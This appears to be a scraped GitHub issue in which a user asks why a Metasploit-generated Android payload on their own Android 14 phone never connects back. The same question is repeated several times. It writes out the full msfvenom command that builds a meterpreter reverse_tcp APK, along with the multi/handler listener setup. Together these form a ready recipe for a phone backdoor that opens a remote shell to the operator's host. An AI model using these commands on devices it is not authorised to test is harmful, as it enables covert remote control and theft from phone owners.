You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android 14 device but am not receiving any signals back from the payload.
Here are the steps I have followed so far:
Generated the payload using msfvenom:
msfvenom -p android/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=4444 R > /path/to/output.apk
Signed the APK using apksigner.
Aligned using Zipalign
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST XXX.XXX.X.X
set LPORT 4444
exploit
Despite this, when I run the exploit command, I do Hello,
I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android device (Device 2) but am not receiving any signals back from the payload.
Here are the steps I have followed so far:
Generated the payload using msfvenom:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > /path/to/output.apk
Signed the APK using apksigner.
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST XXX.XXX.X.X
set LPORT 4444
exploit
Despite this, when I run the exploit command, I do not receive any incoming connections from the target device (Device 2).
Troubleshooting Steps:
I verified that the device is on the same network as my Kali Linux machine.
I confirmed that the payload is executing on Device 2 using logcat.
I checked for any open ports using netstat and nc to ensure nothing else is using the same port.
Error Message:
I am not seeing any connection logs in Metasploit even though I have the listener configured properly.
Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.
Thank you!.
Troubleshooting Steps:
I verified that the device is on the same network as my Kali Linux machine.
I confirmed that the payload is executing on my Android Device using logcat.
I checked for any open ports using netstat and nc to ensure nothing else is using the same port.
I am not seeing any connection logs in Metasploit even though I have the listener configured properly.
Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.
Thank you.
The text was updated successfully, but these errors were encountered:
Hello,
I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android 14 device but am not receiving any signals back from the payload.
Here are the steps I have followed so far:
msfvenom -p android/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=4444 R > /path/to/output.apk
Signed the APK using apksigner.
Aligned using Zipalign
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:
Despite this, when I run the exploit command, I do Hello,
I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android device (Device 2) but am not receiving any signals back from the payload.
Here are the steps I have followed so far:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > /path/to/output.apk
Signed the APK using apksigner.
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:
Despite this, when I run the exploit command, I do not receive any incoming connections from the target device (Device 2).
Troubleshooting Steps:
Error Message:
I am not seeing any connection logs in Metasploit even though I have the listener configured properly.
Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.
Thank you!.
Troubleshooting Steps:
I am not seeing any connection logs in Metasploit even though I have the listener configured properly.
Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.
Thank you.
The text was updated successfully, but these errors were encountered: